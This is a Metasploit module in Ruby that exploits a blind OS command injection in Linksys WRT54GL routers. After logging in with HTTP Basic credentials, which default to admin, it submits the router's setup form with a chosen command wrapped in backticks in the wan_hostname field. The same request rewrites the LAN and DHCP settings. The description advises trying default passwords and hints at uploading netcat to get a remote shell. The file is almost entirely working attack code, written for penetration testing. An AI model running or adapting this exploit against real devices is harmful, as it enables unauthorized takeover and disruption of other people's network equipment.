##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
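class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # HTTP status codes the credential probe treats as "login accepted".
  LOGIN_OK_CODES = [200, 301, 302].freeze

  # Registers module metadata and the datastore options this module reads
  # (TARGETURI, HttpUsername, HttpPassword, CMD, NETMASK, LANIP, ROUTER_NAME,
  # WAN_DOMAIN, WAN_MTU, RPORT).
  #
  # @param info [Hash] metadata merged by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linksys WRT54GL Remote Command Execution',
        'Description' => %q{
          Some Linksys Routers are vulnerable to OS Command injection.
          You will need credentials to the web interface to access the vulnerable part
          of the application.
          Default credentials are always a good starting point. admin/admin or admin
          and blank password could be a first try.
          Note: This is a blind OS command injection vulnerability. This means that
          you will not see any output of your command. Try a ping command to your
          local system and observe the packets with tcpdump (or equivalent) for a first test.

          Hint: To get a remote shell you could upload a netcat binary and exec it.
          WARNING: this module will overwrite network and DHCP configuration.
        },
        'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2023-31742' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ],
          [ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ],
          [ 'EDB', '24202' ],
          [ 'BID', '57459' ],
          [ 'OSVDB', '89421' ]
        ],
        'DisclosureDate' => '2013-01-18',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'PATH to OS Command Injection', '/apply.cgi']),
        OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),
        OptString.new('HttpPassword', [ false, 'Password to login with', 'password']),
        OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']),
        OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']),
        OptAddress.new('LANIP', [ false, 'LAN IP address of the router (default is RHOST)']),
        OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']),
        OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']),
        OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500'])
      ]
    )
  end

  # LAN address that will be written back into the router's configuration:
  # LANIP when the user set it, otherwise RHOST.
  #
  # The value is only usable as four dotted-quad octets; RHOST may be a
  # hostname, so callers must validate the result before using it.
  #
  # @return [String]
  def lan_ip
    configured = datastore['LANIP'].to_s
    configured.empty? ? datastore['RHOST'] : configured
  end

  # Module entry point: checks that the supplied HTTP Basic credentials are
  # accepted, then submits the router's "index" configuration form with CMD
  # embedded in the wan_hostname field. The submission rewrites the device's
  # LAN and DHCP settings (see 'SideEffects'), so the LAN address is validated
  # first to avoid pushing a malformed configuration.
  #
  # @return [Symbol, nil] :abort when a precondition or request fails; nil otherwise
  def run
    uri = datastore['TARGETURI']
    user = datastore['HttpUsername']
    pass = datastore['HttpPassword'].to_s # an unset password is sent as an empty string
    rhost = datastore['RHOST']

    # Refuse to proceed unless the LAN address splits into exactly four numeric
    # octets; a hostname in RHOST would otherwise yield empty lan_ipaddr_* fields.
    octets = lan_ip.split('.')
    unless octets.length == 4 && octets.all? { |octet| octet.match?(/\A\d{1,3}\z/) }
      print_error("LAN address '#{lan_ip}' is not a dotted-quad IPv4 address; set LANIP explicitly")
      return :abort
    end

    # NOTE: the credentials, including the password, are echoed to the console
    # by this and the login result messages.
    print_status("Trying to login with #{user} / #{pass}")
    return :abort unless login_ok?(uri, user, pass, rhost)

    cmd = datastore['CMD']
    print_status("Sending remote command: #{cmd}")
    vprint_status("using the following target URL: #{uri}")

    begin
      res = send_request_cgi(
        'uri' => uri,
        'method' => 'POST',
        'authorization' => basic_auth(user, pass),
        'vars_post' => apply_form(cmd, octets)
      )
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost} - Failed to connect to the web server")
      return :abort
    end

    # The injection is blind: a 200 only tells us the form was accepted.
    if res && res.code == 200
      print_status('Blind Exploitation - Response expected')
    else
      print_error('Blind Exploitation - Unexpected response')
    end
    print_status('Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed')
    print_status('Blind Exploitation - unknown Exploitation state')
  end

  private

  # Sends a GET to +uri+ with HTTP Basic credentials and reports whether the
  # router accepted them. Prints the outcome; returns false when there is no
  # HTTP response, the server cannot be reached, the page is a 404, or the
  # status is not one of LOGIN_OK_CODES.
  #
  # @param uri [String] request path
  # @param user [String] HTTP Basic username
  # @param pass [String] HTTP Basic password
  # @param rhost [String] target host, used only in messages
  # @return [Boolean]
  def login_ok?(uri, user, pass, rhost)
    res = send_request_cgi(
      'uri' => uri,
      'method' => 'GET',
      'authorization' => basic_auth(user, pass)
    )

    unless res.is_a?(Rex::Proto::Http::Response)
      vprint_error("#{rhost} not responding")
      return false
    end

    if res.code == 404
      print_error('Not Found page returned')
      return false
    end

    unless LOGIN_OK_CODES.include?(res.code)
      print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'")
      return false
    end

    print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
    true
  rescue ::Rex::ConnectionError
    vprint_error("#{rhost} - Failed to connect to the web server")
    false
  end

  # Builds the POST body for the router's "index" (basic setup) page. Every
  # field except wan_hostname carries either a fixed value or one of the
  # user-configured datastore options; wan_hostname carries +cmd+ wrapped in
  # backticks. Submitting this form replaces the LAN/DHCP configuration with
  # the values below.
  #
  # @param cmd [String] command string placed into wan_hostname
  # @param octets [Array<String>] the four octets of the LAN address
  # @return [Hash{String => String}] form fields for 'vars_post'
  def apply_form(cmd, octets)
    {
      'submit_button' => 'index',
      'change_action' => '1',
      'submit_type' => '1',
      'action' => 'Apply',
      'now_proto' => 'dhcp',
      'daylight_time' => '1',
      'lan_ipaddr' => '4',
      'wait_time' => '0',
      'need_reboot' => '0',
      'ui_language' => 'de',
      'wan_proto' => 'dhcp',
      'router_name' => datastore['ROUTER_NAME'].to_s,
      'wan_hostname' => "`#{cmd}`",
      'wan_domain' => datastore['WAN_DOMAIN'].to_s,
      'mtu_enable' => '1',
      'wan_mtu' => datastore['WAN_MTU'].to_s,
      'lan_ipaddr_0' => octets[0],
      'lan_ipaddr_1' => octets[1],
      'lan_ipaddr_2' => octets[2],
      'lan_ipaddr_3' => octets[3],
      'lan_netmask' => datastore['NETMASK'].to_s,
      'lan_proto' => 'dhcp',
      'dhcp_check' => '1',
      'dhcp_start' => '100',
      'dhcp_num' => '50',
      'dhcp_lease' => '0',
      'wan_dns' => '4',
      'wan_dns0_0' => '0',
      'wan_dns0_1' => '0',
      'wan_dns0_2' => '0',
      'wan_dns0_3' => '0',
      'wan_dns1_0' => '0',
      'wan_dns1_1' => '0',
      'wan_dns1_2' => '0',
      'wan_dns1_3' => '0',
      'wan_dns2_0' => '0',
      'wan_dns2_1' => '0',
      'wan_dns2_2' => '0',
      'wan_dns2_3' => '0',
      'wan_wins' => '4',
      'wan_wins_0' => '0',
      'wan_wins_1' => '0',
      'wan_wins_2' => '0',
      'wan_wins_3' => '0',
      'time_zone' => '-08+1+1',
      '_daylight_time' => '1'
    }
  end
end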